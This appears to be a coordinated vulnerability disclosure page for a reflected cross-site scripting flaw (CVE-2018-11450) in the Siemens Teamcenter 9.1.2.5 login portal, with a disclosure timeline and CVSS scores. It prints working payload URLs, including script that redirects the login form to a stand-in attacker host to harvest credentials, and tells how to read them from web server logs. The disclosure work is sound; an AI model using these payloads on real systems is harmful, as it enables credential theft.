-
Notifications
You must be signed in to change notification settings - Fork 0
Home
Siemens | Siemens PLM Software TEAMCENTER | Reflected Cross-Site Scripting (XSS) vulnerability
Discoverer: Luc van Donk
Co-Author: Jefferey Hanssen
CVE-ID: CVE-2018-11450
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11450
23-05-2018 09:26 Contacted Siemens ProductCERT
23-05-2018 09:45 First reaction
23-05-2018 13:13 Encrypted traffic both ways
23-05-2018 13:29 Provided report on vulnerability in Teamcenter
06-06-2018 15:04 Received confirmation of the vulnerability
06-06-2018 15:58 Notified Siemens that we would like to publish the vulnerability
07-06-2018 14:55 Siemens provided a reserved CVE-ID and listed us on their Hall of Thanks
13-06-2018 13:33 Siemens told us that the first version that is no longer affected is V9.1.3
24-06-2018 Confirmation allowance to publish vulnerability from third party
Siemens
www.siemens.com
Siemens PLM Software TEAMCENTER
https://www.plm.automation.siemens.com/global/en/products/teamcenter/
Version 9.1.2.5
We did not test any other versions, but Siemens told us that the first version that is no longer affected is V9.1.3. We assume that versions prior to 9.1.2.5 are vulnerable as well.
CVSS v2 Vector
(AV:N/AC:L/Au:N/C:P/I:P/A:N/E:F/RL:OF/RC:C)
- CVSS Base Score: 6.4
- Impact Subscore: 4.9
- Exploitability Subscore: 10.0
- CVSS Temporal Score: 5.3
- CVSS Environmental Score: NA
- Modified Impact Subscore: NA
- Overall CVSS Score: 5.3
Reflected XSS vulnerability,
Login portal,
Allows attacker to inject javascript into the login portal webpage through the url.
If a user visits the login portal through the URL crafted by the attacker, the attacker can insert html/javascript and thus alter/rewrite the login portal page.
This allows the attacker to steal login credentials, redirect the user to a malicious site or execute browser exploits.
http://SERVER:PORT/tc/webclient?lang=<script>alert("Reflected XSS")</script>
http://SERVER:PORT/tc/webclient?lang=<script>this.LoginForm.action='http://Hackers.Website';this.LoginForm.method='get';</script>
Note: In order to make this link work, you might have to escape the special characters depending on the software it is targeted at.
An escaped version of the before mentioned url might look like this:
http://SERVER:PORT/tc/webclient%3Flang%3D%3Cscript%3Ethis.LoginForm.action%3D%27http://Hackers.Website%27%3Bthis.LoginForm.method%3D%27get%27%3B%3C/script%3E
The exploit consists of the url that points to the Siemens login portal and includes the lang (language) parameter. By inserting regular javascript into this parameter, one can add this code to the webpage. In the example mentioned above, we used the following javascript:
<script>
this.LoginForm.action='http://<Hackers.Website>';
this.LoginForm.method='get';
</script>
This code rewrites the type of request and the target of the request issued by the login form. It ensures that the victim’s username and password are submitted (in plain text when making use of http) to the attacker’s server. With this simple example an existing webserver can be used to retrieve the username and password of the victim simply by looking at the access logs of the webserver. (for apache2 on a linux system this is located in /var/log/apache2/access.log by default)
The first version that is no longer affected is V9.1.3